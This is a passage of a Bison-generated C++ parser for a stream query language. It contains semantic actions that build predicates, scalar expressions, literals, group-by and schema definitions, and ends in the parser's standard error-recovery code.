#line 2106 "fta.tab.cc" /* yacc.c:1646 */
break;
case 61:
#line 411 "fta.y" /* yacc.c:1646 */
{(yyval.predp)=NULL;}
#line 2112 "fta.tab.cc" /* yacc.c:1646 */
break;
case 62:
#line 412 "fta.y" /* yacc.c:1646 */
{(yyval.predp)=(yyvsp[0].predp); }
#line 2118 "fta.tab.cc" /* yacc.c:1646 */
break;
case 63:
#line 416 "fta.y" /* yacc.c:1646 */
{(yyval.predp)=NULL;}
#line 2124 "fta.tab.cc" /* yacc.c:1646 */
break;
case 64:
#line 417 "fta.y" /* yacc.c:1646 */
{(yyval.predp)=(yyvsp[0].predp);}
#line 2130 "fta.tab.cc" /* yacc.c:1646 */
break;
case 65:
#line 421 "fta.y" /* yacc.c:1646 */
{(yyval.predp) = (yyvsp[0].predp);}
#line 2136 "fta.tab.cc" /* yacc.c:1646 */
break;
case 66:
#line 428 "fta.y" /* yacc.c:1646 */
{(yyval.predp)=new predicate_t("OR",(yyvsp[-2].predp),(yyvsp[0].predp));}
#line 2142 "fta.tab.cc" /* yacc.c:1646 */
break;
case 67:
#line 429 "fta.y" /* yacc.c:1646 */
{(yyval.predp)=new predicate_t("AND",(yyvsp[-2].predp),(yyvsp[0].predp));}
#line 2148 "fta.tab.cc" /* yacc.c:1646 */
break;
case 68:
#line 430 "fta.y" /* yacc.c:1646 */
{(yyval.predp) = new predicate_t("NOT", (yyvsp[0].predp) );}
#line 2154 "fta.tab.cc" /* yacc.c:1646 */
break;
case 69:
#line 431 "fta.y" /* yacc.c:1646 */
{(yyval.predp) = (yyvsp[-1].predp);}
#line 2160 "fta.tab.cc" /* yacc.c:1646 */
break;
case 70:
#line 432 "fta.y" /* yacc.c:1646 */
{(yyval.predp) = (yyvsp[0].predp);}
#line 2166 "fta.tab.cc" /* yacc.c:1646 */
break;
case 71:
#line 436 "fta.y" /* yacc.c:1646 */
{ (yyval.predp)=(yyvsp[0].predp);}
#line 2172 "fta.tab.cc" /* yacc.c:1646 */
break;
case 72:
#line 437 "fta.y" /* yacc.c:1646 */
{ (yyval.predp) = (yyvsp[0].predp);}
#line 2178 "fta.tab.cc" /* yacc.c:1646 */
break;
case 73:
#line 438 "fta.y" /* yacc.c:1646 */
{(yyval.predp) = predicate_t::make_paramless_fcn_predicate((yyvsp[-2].strval)); }
#line 2184 "fta.tab.cc" /* yacc.c:1646 */
break;
case 74:
#line 439 "fta.y" /* yacc.c:1646 */
{(yyval.predp) = new predicate_t((yyvsp[-3].strval), (yyvsp[-1].se_listval)->get_se_list()); }
#line 2190 "fta.tab.cc" /* yacc.c:1646 */
break;
case 75:
#line 443 "fta.y" /* yacc.c:1646 */
{(yyval.predp) = new predicate_t((yyvsp[-2].scalarval),(yyvsp[-1].strval),(yyvsp[0].scalarval));}
#line 2196 "fta.tab.cc" /* yacc.c:1646 */
break;
case 76:
#line 447 "fta.y" /* yacc.c:1646 */
{ (yyval.predp) = new predicate_t((yyvsp[-4].scalarval),(yyvsp[-1].lit_l)); }
#line 2202 "fta.tab.cc" /* yacc.c:1646 */
break;
case 77:
#line 451 "fta.y" /* yacc.c:1646 */
{(yyval.lit_l) = new literal_list_t((yyvsp[0].litval));}
#line 2208 "fta.tab.cc" /* yacc.c:1646 */
break;
case 78:
#line 452 "fta.y" /* yacc.c:1646 */
{(yyval.lit_l) = (yyvsp[-2].lit_l)->append_literal((yyvsp[0].litval));}
#line 2214 "fta.tab.cc" /* yacc.c:1646 */
break;
case 79:
#line 458 "fta.y" /* yacc.c:1646 */
{ (yyval.scalarval)=new scalarexp_t("+",(yyvsp[-2].scalarval),(yyvsp[0].scalarval));}
#line 2220 "fta.tab.cc" /* yacc.c:1646 */
break;
case 80:
#line 459 "fta.y" /* yacc.c:1646 */
{ (yyval.scalarval)=new scalarexp_t("-",(yyvsp[-2].scalarval),(yyvsp[0].scalarval));}
#line 2226 "fta.tab.cc" /* yacc.c:1646 */
break;
case 81:
#line 460 "fta.y" /* yacc.c:1646 */
{ (yyval.scalarval)=new scalarexp_t("|",(yyvsp[-2].scalarval),(yyvsp[0].scalarval));}
#line 2232 "fta.tab.cc" /* yacc.c:1646 */
break;
case 82:
#line 461 "fta.y" /* yacc.c:1646 */
{ (yyval.scalarval)=new scalarexp_t("*",(yyvsp[-2].scalarval),(yyvsp[0].scalarval));}
#line 2238 "fta.tab.cc" /* yacc.c:1646 */
break;
case 83:
#line 462 "fta.y" /* yacc.c:1646 */
{ (yyval.scalarval)=new scalarexp_t("/",(yyvsp[-2].scalarval),(yyvsp[0].scalarval));}
#line 2244 "fta.tab.cc" /* yacc.c:1646 */
break;
case 84:
#line 463 "fta.y" /* yacc.c:1646 */
{ (yyval.scalarval)=new scalarexp_t("&",(yyvsp[-2].scalarval),(yyvsp[0].scalarval));}
#line 2250 "fta.tab.cc" /* yacc.c:1646 */
break;
case 85:
#line 464 "fta.y" /* yacc.c:1646 */
{ (yyval.scalarval)=new scalarexp_t("%",(yyvsp[-2].scalarval),(yyvsp[0].scalarval));}
#line 2256 "fta.tab.cc" /* yacc.c:1646 */
break;
case 86:
#line 465 "fta.y" /* yacc.c:1646 */
{ (yyval.scalarval)=new scalarexp_t((yyvsp[-1].strval),(yyvsp[-2].scalarval),(yyvsp[0].scalarval));}
#line 2262 "fta.tab.cc" /* yacc.c:1646 */
break;
case 87:
#line 466 "fta.y" /* yacc.c:1646 */
{ (yyval.scalarval) = new scalarexp_t("+",(yyvsp[0].scalarval));}
#line 2268 "fta.tab.cc" /* yacc.c:1646 */
break;
case 88:
#line 467 "fta.y" /* yacc.c:1646 */
{ (yyval.scalarval) = new scalarexp_t("-",(yyvsp[0].scalarval));}
#line 2274 "fta.tab.cc" /* yacc.c:1646 */
break;
case 89:
#line 468 "fta.y" /* yacc.c:1646 */
{ (yyval.scalarval) = new scalarexp_t("!",(yyvsp[0].scalarval));}
#line 2280 "fta.tab.cc" /* yacc.c:1646 */
break;
case 90:
#line 469 "fta.y" /* yacc.c:1646 */
{ (yyval.scalarval) = new scalarexp_t("~",(yyvsp[0].scalarval));}
#line 2286 "fta.tab.cc" /* yacc.c:1646 */
break;
case 91:
#line 470 "fta.y" /* yacc.c:1646 */
{ (yyval.scalarval)= new scalarexp_t((yyvsp[0].litval));}
#line 2292 "fta.tab.cc" /* yacc.c:1646 */
break;
case 92:
#line 471 "fta.y" /* yacc.c:1646 */
{(yyval.scalarval) = scalarexp_t::make_param_reference((yyvsp[0].strval));}
#line 2298 "fta.tab.cc" /* yacc.c:1646 */
break;
case 93:
#line 472 "fta.y" /* yacc.c:1646 */
{(yyval.scalarval) = scalarexp_t::make_iface_param_reference((yyvsp[0].ifpref));}
#line 2304 "fta.tab.cc" /* yacc.c:1646 */
break;
case 94:
#line 473 "fta.y" /* yacc.c:1646 */
{ (yyval.scalarval) = new scalarexp_t((yyvsp[0].colref));}
#line 2310 "fta.tab.cc" /* yacc.c:1646 */
break;
case 95:
#line 474 "fta.y" /* yacc.c:1646 */
{(yyval.scalarval) = (yyvsp[-1].scalarval);}
#line 2316 "fta.tab.cc" /* yacc.c:1646 */
break;
case 96:
#line 475 "fta.y" /* yacc.c:1646 */
{ (yyval.scalarval) = scalarexp_t::make_star_aggr((yyvsp[-3].strval)); }
#line 2322 "fta.tab.cc" /* yacc.c:1646 */
break;
case 97:
#line 476 "fta.y" /* yacc.c:1646 */
{ (yyval.scalarval) = scalarexp_t::make_se_aggr((yyvsp[-3].strval),(yyvsp[-1].scalarval)); }
#line 2328 "fta.tab.cc" /* yacc.c:1646 */
break;
case 98:
#line 477 "fta.y" /* yacc.c:1646 */
{(yyval.scalarval) = new scalarexp_t((yyvsp[-3].strval), (yyvsp[-1].se_listval)->get_se_list()); }
#line 2334 "fta.tab.cc" /* yacc.c:1646 */
break;
case 99:
#line 478 "fta.y" /* yacc.c:1646 */
{(yyval.scalarval) = scalarexp_t::make_paramless_fcn((yyvsp[-2].strval)); }
#line 2340 "fta.tab.cc" /* yacc.c:1646 */
break;
case 100:
#line 479 "fta.y" /* yacc.c:1646 */
{ (yyval.scalarval) = scalarexp_t::make_star_aggr((yyvsp[-4].strval)); (yyval.scalarval)->set_superaggr(true); }
#line 2346 "fta.tab.cc" /* yacc.c:1646 */
break;
case 101:
#line 480 "fta.y" /* yacc.c:1646 */
{ (yyval.scalarval) = scalarexp_t::make_se_aggr((yyvsp[-4].strval),(yyvsp[-1].scalarval)); (yyval.scalarval)->set_superaggr(true); }
#line 2352 "fta.tab.cc" /* yacc.c:1646 */
break;
case 102:
#line 481 "fta.y" /* yacc.c:1646 */
{(yyval.scalarval) = new scalarexp_t((yyvsp[-4].strval), (yyvsp[-1].se_listval)->get_se_list()); (yyval.scalarval)->set_superaggr(true); }
#line 2358 "fta.tab.cc" /* yacc.c:1646 */
break;
case 103:
#line 482 "fta.y" /* yacc.c:1646 */
{(yyval.scalarval) = scalarexp_t::make_paramless_fcn((yyvsp[-3].strval)); (yyval.scalarval)->set_superaggr(true); }
#line 2364 "fta.tab.cc" /* yacc.c:1646 */
break;
case 104:
#line 487 "fta.y" /* yacc.c:1646 */
{ (yyval.select_listval)= new select_list_t((yyvsp[0].scalarval)); }
#line 2370 "fta.tab.cc" /* yacc.c:1646 */
break;
case 105:
#line 488 "fta.y" /* yacc.c:1646 */
{ (yyval.select_listval)= new select_list_t((yyvsp[-2].scalarval),(yyvsp[0].strval)); }
#line 2376 "fta.tab.cc" /* yacc.c:1646 */
break;
case 106:
#line 489 "fta.y" /* yacc.c:1646 */
{ (yyval.select_listval)=(yyvsp[-2].select_listval)->append((yyvsp[0].scalarval)); }
#line 2382 "fta.tab.cc" /* yacc.c:1646 */
break;
case 107:
#line 490 "fta.y" /* yacc.c:1646 */
{ (yyval.select_listval)=(yyvsp[-4].select_listval)->append((yyvsp[-2].scalarval),(yyvsp[0].strval)); }
#line 2388 "fta.tab.cc" /* yacc.c:1646 */
break;
case 108:
#line 494 "fta.y" /* yacc.c:1646 */
{ (yyval.se_listval)= new se_list_t((yyvsp[0].scalarval)); }
#line 2394 "fta.tab.cc" /* yacc.c:1646 */
break;
case 109:
#line 495 "fta.y" /* yacc.c:1646 */
{ (yyval.se_listval)=(yyvsp[-2].se_listval)->append((yyvsp[0].scalarval)); }
#line 2400 "fta.tab.cc" /* yacc.c:1646 */
break;
case 110:
#line 499 "fta.y" /* yacc.c:1646 */
{(yyval.litval) = new literal_t((yyvsp[0].strval),LITERAL_STRING);}
#line 2406 "fta.tab.cc" /* yacc.c:1646 */
break;
case 111:
#line 500 "fta.y" /* yacc.c:1646 */
{(yyval.litval) = new literal_t((yyvsp[0].strval),LITERAL_INT);}
#line 2412 "fta.tab.cc" /* yacc.c:1646 */
break;
case 112:
#line 501 "fta.y" /* yacc.c:1646 */
{(yyval.litval) = new literal_t((yyvsp[0].strval),LITERAL_LONGINT);}
#line 2418 "fta.tab.cc" /* yacc.c:1646 */
break;
case 113:
#line 502 "fta.y" /* yacc.c:1646 */
{(yyval.litval) = new literal_t((yyvsp[0].strval),LITERAL_FLOAT);}
#line 2424 "fta.tab.cc" /* yacc.c:1646 */
break;
case 114:
#line 503 "fta.y" /* yacc.c:1646 */
{(yyval.litval) = new literal_t("TRUE",LITERAL_BOOL);}
#line 2430 "fta.tab.cc" /* yacc.c:1646 */
break;
case 115:
#line 504 "fta.y" /* yacc.c:1646 */
{(yyval.litval) = new literal_t("FALSE",LITERAL_BOOL);}
#line 2436 "fta.tab.cc" /* yacc.c:1646 */
break;
case 116:
#line 505 "fta.y" /* yacc.c:1646 */
{(yyval.litval) = new literal_t((yyvsp[0].strval),LITERAL_TIMEVAL);}
#line 2442 "fta.tab.cc" /* yacc.c:1646 */
break;
case 117:
#line 506 "fta.y" /* yacc.c:1646 */
{(yyval.litval) = new literal_t((yyvsp[0].strval),LITERAL_HEX);}
#line 2448 "fta.tab.cc" /* yacc.c:1646 */
break;
case 118:
#line 507 "fta.y" /* yacc.c:1646 */
{(yyval.litval) = new literal_t((yyvsp[0].strval),LITERAL_LONGHEX);}
#line 2454 "fta.tab.cc" /* yacc.c:1646 */
break;
case 119:
#line 508 "fta.y" /* yacc.c:1646 */
{(yyval.litval) = new literal_t((yyvsp[0].strval),LITERAL_IP);}
#line 2460 "fta.tab.cc" /* yacc.c:1646 */
break;
case 120:
#line 509 "fta.y" /* yacc.c:1646 */
{(yyval.litval) = new literal_t((yyvsp[0].strval),LITERAL_IPV6);}
#line 2466 "fta.tab.cc" /* yacc.c:1646 */
break;
case 121:
#line 510 "fta.y" /* yacc.c:1646 */
{(yyval.litval) = literal_t::make_define_literal((yyvsp[0].strval),fta_parse_defines);}
#line 2472 "fta.tab.cc" /* yacc.c:1646 */
break;
case 122:
#line 516 "fta.y" /* yacc.c:1646 */
{(yyval.extended_gb_list) = NULL;}
#line 2478 "fta.tab.cc" /* yacc.c:1646 */
break;
case 123:
#line 517 "fta.y" /* yacc.c:1646 */
{(yyval.extended_gb_list) = (yyvsp[0].extended_gb_list);}
#line 2484 "fta.tab.cc" /* yacc.c:1646 */
break;
case 124:
#line 521 "fta.y" /* yacc.c:1646 */
{(yyval.clist) = NULL;}
#line 2490 "fta.tab.cc" /* yacc.c:1646 */
break;
case 125:
#line 522 "fta.y" /* yacc.c:1646 */
{(yyval.clist) = (yyvsp[0].clist);}
#line 2496 "fta.tab.cc" /* yacc.c:1646 */
break;
case 126:
#line 526 "fta.y" /* yacc.c:1646 */
{ (yyval.list_of_gb_list) = new list_of_gb_list_t((yyvsp[-1].gb_list));}
#line 2502 "fta.tab.cc" /* yacc.c:1646 */
break;
case 127:
#line 527 "fta.y" /* yacc.c:1646 */
{(yyval.list_of_gb_list) = (yyvsp[-4].list_of_gb_list)->append((yyvsp[-1].gb_list));}
#line 2508 "fta.tab.cc" /* yacc.c:1646 */
break;
case 128:
#line 531 "fta.y" /* yacc.c:1646 */
{(yyval.extended_gb) = extended_gb_t::create_from_gb((yyvsp[0].gb_val));}
#line 2514 "fta.tab.cc" /* yacc.c:1646 */
break;
case 129:
#line 532 "fta.y" /* yacc.c:1646 */
{(yyval.extended_gb) = extended_gb_t::extended_create_from_rollup((yyvsp[-1].gb_list));}
#line 2520 "fta.tab.cc" /* yacc.c:1646 */
break;
case 130:
#line 533 "fta.y" /* yacc.c:1646 */
{(yyval.extended_gb) = extended_gb_t::extended_create_from_cube((yyvsp[-1].gb_list));}
#line 2526 "fta.tab.cc" /* yacc.c:1646 */
break;
case 131:
#line 534 "fta.y" /* yacc.c:1646 */
{(yyval.extended_gb) = extended_gb_t::extended_create_from_gsets((yyvsp[-1].list_of_gb_list));}
#line 2532 "fta.tab.cc" /* yacc.c:1646 */
break;
case 132:
#line 538 "fta.y" /* yacc.c:1646 */
{ (yyval.extended_gb_list) = new extended_gb_list_t((yyvsp[0].extended_gb));}
#line 2538 "fta.tab.cc" /* yacc.c:1646 */
break;
case 133:
#line 539 "fta.y" /* yacc.c:1646 */
{ (yyval.extended_gb_list)=(yyvsp[-2].extended_gb_list)->append((yyvsp[0].extended_gb));}
#line 2544 "fta.tab.cc" /* yacc.c:1646 */
break;
case 134:
#line 543 "fta.y" /* yacc.c:1646 */
{ (yyval.gb_list) = new gb_list_t((yyvsp[0].gb_val));}
#line 2550 "fta.tab.cc" /* yacc.c:1646 */
break;
case 135:
#line 544 "fta.y" /* yacc.c:1646 */
{ (yyval.gb_list)=(yyvsp[-2].gb_list)->append((yyvsp[0].gb_val));}
#line 2556 "fta.tab.cc" /* yacc.c:1646 */
break;
case 136:
#line 548 "fta.y" /* yacc.c:1646 */
{(yyval.gb_val) = new gb_t((yyvsp[0].strval)); }
#line 2562 "fta.tab.cc" /* yacc.c:1646 */
break;
case 137:
#line 549 "fta.y" /* yacc.c:1646 */
{(yyval.gb_val) = new gb_t((yyvsp[-2].strval),(yyvsp[0].strval)); }
#line 2568 "fta.tab.cc" /* yacc.c:1646 */
break;
case 138:
#line 550 "fta.y" /* yacc.c:1646 */
{(yyval.gb_val) = new gb_t((yyvsp[-4].strval),(yyvsp[-2].strval),(yyvsp[0].strval)); }
#line 2574 "fta.tab.cc" /* yacc.c:1646 */
break;
case 139:
#line 551 "fta.y" /* yacc.c:1646 */
{(yyval.gb_val) = new gb_t((yyvsp[-2].scalarval),(yyvsp[0].strval)); }
#line 2580 "fta.tab.cc" /* yacc.c:1646 */
break;
case 140:
#line 562 "fta.y" /* yacc.c:1646 */
{(yyval.ifpref) = new ifpref_t((yyvsp[0].strval));}
#line 2586 "fta.tab.cc" /* yacc.c:1646 */
break;
case 141:
#line 563 "fta.y" /* yacc.c:1646 */
{(yyval.ifpref) = new ifpref_t((yyvsp[-3].strval), (yyvsp[0].strval));}
#line 2592 "fta.tab.cc" /* yacc.c:1646 */
break;
case 142:
#line 567 "fta.y" /* yacc.c:1646 */
{(yyval.colref) = new colref_t((yyvsp[0].strval)); }
#line 2598 "fta.tab.cc" /* yacc.c:1646 */
break;
case 143:
#line 568 "fta.y" /* yacc.c:1646 */
{(yyval.colref) = new colref_t((yyvsp[-2].strval),(yyvsp[0].strval)); }
#line 2604 "fta.tab.cc" /* yacc.c:1646 */
break;
case 144:
#line 569 "fta.y" /* yacc.c:1646 */
{(yyval.colref) = new colref_t((yyvsp[-4].strval),(yyvsp[-2].strval),(yyvsp[0].strval)); }
#line 2610 "fta.tab.cc" /* yacc.c:1646 */
break;
case 145:
#line 573 "fta.y" /* yacc.c:1646 */
{(yyval.clist)=new colref_list_t((yyvsp[-2].colref)); (yyval.clist)->append((yyvsp[0].colref));}
#line 2616 "fta.tab.cc" /* yacc.c:1646 */
break;
case 146:
#line 574 "fta.y" /* yacc.c:1646 */
{(yyval.clist) = (yyvsp[-2].clist)->append((yyvsp[0].colref));}
#line 2622 "fta.tab.cc" /* yacc.c:1646 */
break;
case 147:
#line 578 "fta.y" /* yacc.c:1646 */
{(yyval.colref) = new colref_t((yyvsp[0].strval)); }
#line 2628 "fta.tab.cc" /* yacc.c:1646 */
break;
case 148:
#line 582 "fta.y" /* yacc.c:1646 */
{(yyval.clist)=new colref_list_t((yyvsp[-2].colref)); (yyval.clist)->append((yyvsp[0].colref));}
#line 2634 "fta.tab.cc" /* yacc.c:1646 */
break;
case 149:
#line 583 "fta.y" /* yacc.c:1646 */
{(yyval.clist) = (yyvsp[-2].clist)->append((yyvsp[0].colref));}
#line 2640 "fta.tab.cc" /* yacc.c:1646 */
break;
case 150:
#line 598 "fta.y" /* yacc.c:1646 */
{(yyval.table_list_schema) = new table_list((yyvsp[0].table_def_t));}
#line 2646 "fta.tab.cc" /* yacc.c:1646 */
break;
case 151:
#line 599 "fta.y" /* yacc.c:1646 */
{(yyval.table_list_schema) = (yyvsp[-1].table_list_schema)->append_table((yyvsp[0].table_def_t));}
#line 2652 "fta.tab.cc" /* yacc.c:1646 */
break;
case 152:
#line 602 "fta.y" /* yacc.c:1646 */
{
(yyval.table_def_t)=new table_def((yyvsp[-5].strval),(yyvsp[-4].plist_t),(yyvsp[-3].plist_t), (yyvsp[-1].field_list_t), PROTOCOL_SCHEMA); delete (yyvsp[-4].plist_t); delete (yyvsp[-1].field_list_t);}
#line 2659 "fta.tab.cc" /* yacc.c:1646 */
break;
case 153:
#line 604 "fta.y" /* yacc.c:1646 */
{
(yyval.table_def_t)=new table_def((yyvsp[-4].stringval)->c_str(),(yyvsp[-3].plist_t),NULL,(yyvsp[-1].field_list_t), STREAM_SCHEMA); delete (yyvsp[-1].field_list_t);}
#line 2666 "fta.tab.cc" /* yacc.c:1646 */
break;
case 154:
#line 606 "fta.y" /* yacc.c:1646 */
{
(yyval.table_def_t) = new table_def((yyvsp[-14].strval), (yyvsp[-11].plist_t), (yyvsp[-8].field_list_t), (yyvsp[-4].subqueryspec_list_t), (yyvsp[-1].plist_t)); }
#line 2673 "fta.tab.cc" /* yacc.c:1646 */
break;
case 155:
#line 608 "fta.y" /* yacc.c:1646 */
{ (yyval.table_def_t) = new table_def((yyvsp[-1].ufcnl)); }
#line 2679 "fta.tab.cc" /* yacc.c:1646 */
break;
case 156:
#line 612 "fta.y" /* yacc.c:1646 */
{(yyval.ufcnl) = new unpack_fcn_list((yyvsp[0].ufcn));}
#line 2685 "fta.tab.cc" /* yacc.c:1646 */
break;
case 157:
#line 613 "fta.y" /* yacc.c:1646 */
{(yyval.ufcnl) = (yyvsp[-2].ufcnl) -> append((yyvsp[0].ufcn));}
#line 2691 "fta.tab.cc" /* yacc.c:1646 */
break;
case 158:
#line 617 "fta.y" /* yacc.c:1646 */
{(yyval.ufcn) = new unpack_fcn((yyvsp[-2].strval),(yyvsp[-1].strval),(yyvsp[0].strval));}
#line 2697 "fta.tab.cc" /* yacc.c:1646 */
break;
case 159:
#line 621 "fta.y" /* yacc.c:1646 */
{(yyval.subqueryspec_list_t) = new subqueryspec_list((yyvsp[0].subq_spec_t));}
#line 2703 "fta.tab.cc" /* yacc.c:1646 */
break;
case 160:
#line 622 "fta.y" /* yacc.c:1646 */
{(yyval.subqueryspec_list_t) = (yyvsp[-2].subqueryspec_list_t)->append((yyvsp[0].subq_spec_t));}
#line 2709 "fta.tab.cc" /* yacc.c:1646 */
break;
case 161:
#line 626 "fta.y" /* yacc.c:1646 */
{(yyval.subq_spec_t)=new subquery_spec((yyvsp[-3].strval), (yyvsp[-1].namevec_t)); delete (yyvsp[-1].namevec_t);}
#line 2715 "fta.tab.cc" /* yacc.c:1646 */
break;
case 162:
#line 629 "fta.y" /* yacc.c:1646 */
{(yyval.field_list_t) = new field_entry_list((yyvsp[0].field_t));}
#line 2721 "fta.tab.cc" /* yacc.c:1646 */
break;
case 163:
#line 630 "fta.y" /* yacc.c:1646 */
{(yyval.field_list_t) = (yyvsp[-1].field_list_t)->append_field((yyvsp[0].field_t));}
#line 2727 "fta.tab.cc" /* yacc.c:1646 */
break;
case 164:
#line 634 "fta.y" /* yacc.c:1646 */
{(yyval.field_t) = new field_entry((yyvsp[-5].strval),(yyvsp[-4].strval),(yyvsp[-3].strval),(yyvsp[-2].plist_t),(yyvsp[-1].plist_t));}
#line 2733 "fta.tab.cc" /* yacc.c:1646 */
break;
case 165:
#line 635 "fta.y" /* yacc.c:1646 */
{(yyval.field_t) = new field_entry((yyvsp[-3].strval),(yyvsp[-2].strval),"",(yyvsp[-1].plist_t),NULL);}
#line 2739 "fta.tab.cc" /* yacc.c:1646 */
break;
case 166:
#line 639 "fta.y" /* yacc.c:1646 */
{(yyval.plist_t) = NULL;}
#line 2745 "fta.tab.cc" /* yacc.c:1646 */
break;
case 167:
#line 640 "fta.y" /* yacc.c:1646 */
{(yyval.plist_t) = (yyvsp[-1].plist_t);}
#line 2751 "fta.tab.cc" /* yacc.c:1646 */
break;
case 168:
#line 644 "fta.y" /* yacc.c:1646 */
{(yyval.plist_t) = new param_list((yyvsp[0].strval));}
#line 2757 "fta.tab.cc" /* yacc.c:1646 */
break;
case 169:
#line 645 "fta.y" /* yacc.c:1646 */
{(yyval.plist_t) = new param_list((yyvsp[-1].strval),(yyvsp[0].strval));}
#line 2763 "fta.tab.cc" /* yacc.c:1646 */
break;
case 170:
#line 646 "fta.y" /* yacc.c:1646 */
{(yyval.plist_t) = new param_list((yyvsp[-1].strval),(yyvsp[0].strval));}
#line 2769 "fta.tab.cc" /* yacc.c:1646 */
break;
case 171:
#line 647 "fta.y" /* yacc.c:1646 */
{(yyval.plist_t) = new param_list((yyvsp[-1].strval),(yyvsp[0].strval));}
#line 2775 "fta.tab.cc" /* yacc.c:1646 */
break;
case 172:
#line 648 "fta.y" /* yacc.c:1646 */
{(yyval.plist_t) = (yyvsp[-2].plist_t)->append((yyvsp[0].strval));}
#line 2781 "fta.tab.cc" /* yacc.c:1646 */
break;
case 173:
#line 649 "fta.y" /* yacc.c:1646 */
{(yyval.plist_t) = (yyvsp[-3].plist_t)->append((yyvsp[-1].strval),(yyvsp[0].strval));}
#line 2787 "fta.tab.cc" /* yacc.c:1646 */
break;
case 174:
#line 650 "fta.y" /* yacc.c:1646 */
{(yyval.plist_t) = (yyvsp[-3].plist_t)->append((yyvsp[-1].strval),(yyvsp[0].strval));}
#line 2793 "fta.tab.cc" /* yacc.c:1646 */
break;
case 175:
#line 651 "fta.y" /* yacc.c:1646 */
{(yyval.plist_t) = (yyvsp[-3].plist_t)->append((yyvsp[-1].strval),(yyvsp[0].strval));}
#line 2799 "fta.tab.cc" /* yacc.c:1646 */
break;
case 176:
#line 655 "fta.y" /* yacc.c:1646 */
{(yyval.plist_t) = NULL;}
#line 2805 "fta.tab.cc" /* yacc.c:1646 */
break;
case 177:
#line 656 "fta.y" /* yacc.c:1646 */
{(yyval.plist_t) = (yyvsp[-1].plist_t);}
#line 2811 "fta.tab.cc" /* yacc.c:1646 */
break;
case 178:
#line 660 "fta.y" /* yacc.c:1646 */
{(yyval.plist_t) = NULL;}
#line 2817 "fta.tab.cc" /* yacc.c:1646 */
break;
case 179:
#line 661 "fta.y" /* yacc.c:1646 */
{(yyval.plist_t) = (yyvsp[-1].plist_t);}
#line 2823 "fta.tab.cc" /* yacc.c:1646 */
break;
case 180:
#line 665 "fta.y" /* yacc.c:1646 */
{(yyval.plist_t) = new param_list((yyvsp[0].strval));}
#line 2829 "fta.tab.cc" /* yacc.c:1646 */
break;
case 181:
#line 666 "fta.y" /* yacc.c:1646 */
{(yyval.plist_t) = (yyvsp[-2].plist_t)->append((yyvsp[0].strval));}
#line 2835 "fta.tab.cc" /* yacc.c:1646 */
break;
case 182:
#line 670 "fta.y" /* yacc.c:1646 */
{(yyval.namevec_t) = new name_vec((yyvsp[-2].strval),(yyvsp[-1].strval),(yyvsp[0].plist_t));}
#line 2841 "fta.tab.cc" /* yacc.c:1646 */
break;
case 183:
#line 671 "fta.y" /* yacc.c:1646 */
{(yyval.namevec_t) = (yyvsp[-4].namevec_t)->append((yyvsp[-2].strval),(yyvsp[-1].strval), (yyvsp[0].plist_t));}
#line 2847 "fta.tab.cc" /* yacc.c:1646 */
break;
#line 2851 "fta.tab.cc" /* yacc.c:1646 */
default: break;
}
/* User semantic actions sometimes alter yychar, and that requires
that yytoken be updated with the new translation. We take the
approach of translating immediately before every use of yytoken.
One alternative is translating here after every semantic action,
but that translation would be missed if the semantic action invokes
YYABORT, YYACCEPT, or YYERROR immediately after altering yychar or
if it invokes YYBACKUP. In the case of YYABORT or YYACCEPT, an
incorrect destructor might then be invoked immediately. In the
case of YYERROR or YYBACKUP, subsequent parser actions might lead
to an incorrect destructor call or verbose syntax error message
before the lookahead is translated. */
YY_SYMBOL_PRINT ("-> $$ =", yyr1[yyn], &yyval, &yyloc);
YYPOPSTACK (yylen);
yylen = 0;
YY_STACK_PRINT (yyss, yyssp);
*++yyvsp = yyval;
/* Now 'shift' the result of the reduction. Determine what state
that goes to, based on the state we popped back to and the rule
number reduced by. */
yyn = yyr1[yyn];
yystate = yypgoto[yyn - YYNTOKENS] + *yyssp;
if (0 <= yystate && yystate <= YYLAST && yycheck[yystate] == *yyssp)
yystate = yytable[yystate];
else
yystate = yydefgoto[yyn - YYNTOKENS];
goto yynewstate;
/*--------------------------------------.
| yyerrlab -- here on detecting error. |
`--------------------------------------*/
yyerrlab:
/* Make sure we have latest lookahead translation. See comments at
user semantic actions for why this is necessary. */
yytoken = yychar == YYEMPTY ? YYEMPTY : YYTRANSLATE (yychar);
/* If not already recovering from an error, report this error. */
if (!yyerrstatus)
{
++yynerrs;
#if ! YYERROR_VERBOSE
yyerror (YY_("syntax error"));
#else
# define YYSYNTAX_ERROR yysyntax_error (&yymsg_alloc, &yymsg, \
yyssp, yytoken)
{
char const *yymsgp = YY_("syntax error");
int yysyntax_error_status;
yysyntax_error_status = YYSYNTAX_ERROR;
if (yysyntax_error_status == 0)
yymsgp = yymsg;
else if (yysyntax_error_status == 1)
{
if (yymsg != yymsgbuf)
YYSTACK_FREE (yymsg);
yymsg = (char *) YYSTACK_ALLOC (yymsg_alloc);
if (!yymsg)
{
yymsg = yymsgbuf;
yymsg_alloc = sizeof yymsgbuf;
yysyntax_error_status = 2;
}
else
{
yysyntax_error_status = YYSYNTAX_ERROR;
yymsgp = yymsg;
}
}
yyerror (yymsgp);
if (yysyntax_error_status == 2)
goto yyexhaustedlab;
}
# undef YYSYNTAX_ERROR
#endif
}
if (yyerrstatus == 3)
{
/* If just tried and failed to reuse lookahead token after an
error, discard it. */
if (yychar <= YYEOF)
{
/* Return failure if at end of input. */
if (yychar == YYEOF)
YYABORT;
}
else
{
yydestruct ("Error: discarding",
yytoken, &yylval);
yychar = YYEMPTY;
}
}
/* Else will try to reuse lookahead token after shifting the error
token. */
goto yyerrlab1;
/*---------------------------------------------------.
| yyerrorlab -- error raised explicitly by YYERROR. |
`---------------------------------------------------*/
yyerrorlab:
/* Pacify compilers like GCC when the user code never invokes
YYERROR and the label yyerrorlab therefore never appears in user
code. */
if (/*CONSTCOND*/ 0)
goto yyerrorlab;
/* Do not reclaim the symbols of the rule whose action triggered
this YYERROR. */
YYPOPSTACK (yylen);
yylen = 0;
YY_STACK_PRINT (yyss, yyssp);
yystate = *yyssp;
goto yyerrlab1;
/*-------------------------------------------------------------.
| yyerrlab1 -- common code for both syntax error and YYERROR. |
`-------------------------------------------------------------*/
yyerrlab1:
yyerrstatus = 3; /* Each real token shifted decrements this. */
for (;;)
{
yyn = yypact[yystate];
if (!yypact_value_is_default (yyn))
{
yyn += YYTERROR;
if (0 <= yyn && yyn <= YYLAST && yycheck[yyn] == YYTERROR)
{
yyn = yytable[yyn];
if (0 < yyn)
break;
}
}
/* Pop the current state because it cannot handle the error token. */
if (yyssp == yyss)
YYABORT;
yydestruct ("Error: popping",
yystos[yystate], yyvsp);
YYPOPSTACK (1);
yystate = *yyssp;
